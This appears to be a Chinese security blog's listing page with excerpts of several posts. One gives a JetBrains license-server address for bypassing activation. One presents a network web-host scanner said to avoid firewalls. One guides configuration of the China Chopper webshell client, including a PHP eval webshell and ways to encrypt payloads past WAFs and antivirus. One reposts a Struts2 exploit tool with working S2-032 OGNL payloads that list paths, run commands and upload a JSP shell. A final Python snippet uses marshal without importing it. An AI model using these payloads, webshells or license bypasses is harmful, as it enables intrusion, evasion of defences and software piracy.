Idea 激活服务器

主要平时老用jetbrains系列的编辑器,每次还要激活找激活码什么的,太麻烦了,就自己搭建了一个,方便自己用.

激活过程如下:
1、激活的时候选择License server
2、填写server地址为http://idea.03sec.com:8727
3、保存,激活成功!
下载.png

主要平时老用jetbrains系列的编辑器,每次还要激活找激活码什么的,太麻烦了,就自己搭建了一个,方便自己用. 激活过程如下: 1、激活的时候选择License server 2、填写server地址为http://idea.03sec.com:8727 3、保存,激活成功!

>>>>>>>>>>>>>>阅读全文<<<<<<<<<<<<<<

以爬虫式进行网段Web主机发现的小工具【httpscan】

逛github,发现一个小工具,扔出了分享下

原github地址:https://github.com/zer0h/httpscan

httpscan是一个扫描指定CIDR网段的Web主机的小工具。和端口扫描器不一样,httpscan是以爬虫的方式进行Web主机发现,因此相对来说不容易被防火墙拦截。

httpscan会返回IP http状态码 Web容器版本 以及网站标题。

demo.png

Usage:./httpscan IP/CIDR –t threads

Example:./httpscan.py 10.20.30.0/24 –t 10

逛github,发现一个小工具,扔出了分享下 原github地址:https://github.com/zer0h/httpscan httpscan是一个扫描指定CIDR网段的Web主机的小工具。和端口扫描器不一样,httpscan是以爬虫的方式进行Web主机发现,因此相对来说不容易被防火墙拦截。 httpscan会返回IP http状态码 Web容...

>>>>>>>>>>>>>>阅读全文<<<<<<<<<<<<<<

caidao.conf参数表

  1. <FLAG>

返回的内容分隔符,只限三个字符。我们知道原来的分割符是 ->| 与 |<-, 有些 waf 会拦截这个字符,所以,我们可以用生辟点的字符,比如说 ~>$。

  1. <UA>

定制 HTTP 请求中的 User-Agent 部分,我们看到默认的 caidao.conf 中将 UA 改成了百度蜘蛛的 UA, 当然你可以改成 Google 的嘛。有些时候需要改改,大部分情况下这个参数可以不用改。

  1. <K1> 与 <K2>

POST的参数名称,默认情况下, K1 是 z1,K2 是 z2。一般情况下,waf 是不会拦这个,所以可以不用改。

  1. <PHP_BASE>, <ASP_BASE>, <ASPX_BASE>, <PHP_BASE.加密示例>

这4个是 webshell 的基础代码部分,所有的功能代码都会发到这里进行组装,然后发送到服务端去。

如果你服务端的 webshell 做了一层加解密操作,比如服务端代码是这样的

<?php @eval(base64_decode($_POST['caidao']));?>

那么,你就可以在这里修改配置为

<PHP_BASE.加密示例>eval(base64_decode($_POST[id]));&id=%s</PHP_BASE.加密示例>

可以负责任的讲,免杀,过 waf 大部分都是在这里作文章的,后面基本都是一些功能函数,waf 一般是不会杀的,他要是敢杀,就证明他的业务中不需要那类操作。

这里就有意思了,你想,以前的菜刀只有一个 base64_decode 那现在,你就可以随便改了,比如说,你用 hex, 再比如你可以用凯撒密码,又或者是栅栏密码,再过分点,你可以用 AES, DES,最过分的就是自己写一个加密解密的算法。那样 waf 想拦就很尴尬了。(作者说的过 waf 大概就是这层意思吧)

  1. <GETBASEINFO>

获取基础信息的功能代码。比如你添加完 shell, 直接去虚拟终端,一进去就会显示当前路径,当前用户,系统类型什么的这些。

  1. <SHOWFOLDER>

文件目录查看功能代码。这里主要就是用户传进来一个路径,然后把这个路径下的目录,文件全都显示出来,包括一些属性,比如文件时间,权限,类型等。

  1. <SHOWTXTFILE>

查看文件内容,编辑文件也首先调用的就是这里。

  1. <SAVETXTFILE>

保存文件。

  1. <DELETEFILE>

删除文件。

10.<DOWNFILE>

下载服务器文件到本地。

  1. <UPLOADFILE>

上传文件到服务端。

  1. <PASTEFILE>

粘贴文件。

  1. <NEWFOLDER>

新建目录。

  1. <WGET>

从远程下载一个文件到服务器。

  1. <SHELL>

执行系统命令,这里比较尴尬的地方,就是相关函数被干掉的话,基本是没戏。

其它的就是一些数据库的功能代码了,我实在是不想写了,就那几个单词,百度翻译都知道是什么意思,我就不翻译了哈。

<FLAG> 返回的内容分隔符,只限三个字符。我们知道原来的分割符是 ->| 与 |<-, 有些 waf 会拦截这个字符,所以,我们可以用生辟点的字符,比如说 ~>$。 <UA> 定制 HTTP 请求中的 User-Agent 部分,我们看到默认的 caidao.conf 中将 UA 改成了百度蜘蛛的 ...

>>>>>>>>>>>>>>阅读全文<<<<<<<<<<<<<<

[转]Struts2漏洞利用工具下载(已更新2016-V1.6版)

原文地址:http://www.shack2.org/article/1374154000.html
Struts2漏洞利用工具下载(已更新V1.6版)

新鲜出炉支持Struts2 s2-032漏洞的检查利用。如果有对Struts2 S2-029 这个鸡肋漏洞有兴趣的可以找我要下检查工具,这个鸡肋工具就不在这里共享了。

顺便分享下我改写的exp:

S2-032 20160426 漏洞参考 http://seclab.dbappsecurity.com.cn/?p=924

获取磁盘目录:

method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23path%3d%23req.getRealPath(%23parameters.pp[0]),%23w%3d%23res.getWriter(),%23w.print(%23path),1?%23xx:%23request.toString&pp=%2f&encoding=UTF-8

执行命令:

  1. method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[

  2. method:%23_memberAccess[%23parameters.name1[

上传文件:

method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23path%3d%23req.getRealPath(%23parameters.pp[0]),new%20java.io.BufferedWriter(new%20java.io.FileWriter(%23path%2b%23parameters.shellname[0]).append(%23parameters.shellContent[0])).close(),%23w.print(%23path),%23w.close(),1?%23xx:%23request.toString&shellname=stest.jsp&shellContent=tttt&encoding=UTF-8&pp=%2f

更新日志:

2016-04-26:
增加最新的S2-032远程代码执行漏洞,和S2-019很相似。
参考:http://seclab.dbappsecurity.com.cn/?p=924

2015-12-01:
采用scanner读数据流,再也不用担心s16不能执行net user/ipconfig/netstat -an等命令了。
增加复杂数据包(multipart/form-data)提交方式进行漏洞利用,可绕过部分防护。可执行命令,暂时无法上传文件。

2014-11-12:
最近遇到s19这个debug模式开启导致代码执行,这个有点少,但还是有一些,为了方便大家把13版本修改了一下。可以利用这个漏洞执行命令、上传shell。
警告:
本工具为漏洞自查工具,请勿非法攻击他人网站!

仅提供验证漏洞使用,请勿非法使用,产生的任何法律问题,一概与本人无关。

1461677890633_003831.jpg

下载地址:
Struts2漏洞利用工具2016版.rar 1461677445539015176.rar
Struts2漏洞利用工具2015版.rar 1449155324117072208.rar

原文地址:http://www.shack2.org/article/1374154000.html Struts2漏洞利用工具下载(已更新V1.6版) 新鲜出炉支持Struts2 s2-032漏洞的检查利用。如果有对Struts2 S2-029 这个鸡肋漏洞有兴趣的可以找我要下检查工具,这个鸡肋工具就不在这里共享了。 顺便分享下我改写的exp: S2...

>>>>>>>>>>>>>>阅读全文<<<<<<<<<<<<<<

将PyCodeObject保存为pyc

#!/usr/bin/env python

import py_compile
import imp
import os

def pycodeobject2pyc(pyobj, pycfile):
    with open(pycfile, 'wb') as fc: 
        fc.write('\0\0\0\0')
        timestamp = long(os.fstat(fc.fileno()).st_mtime)
        py_compile.wr_long(fc, timestamp)
        marshal.dump(pyobj, fc)
        fc.flush()
        fc.seek(0, 0)
        MAGIC = imp.get_magic()
        fc.write(MAGIC)

#!/usr/bin/env python import py_compile import imp import os def pycodeobject2pyc(pyobj, pycfile): with open(pycfile, 'wb') as fc: fc.write('\0\0\0\0') ti...

>>>>>>>>>>>>>>阅读全文<<<<<<<<<<<<<<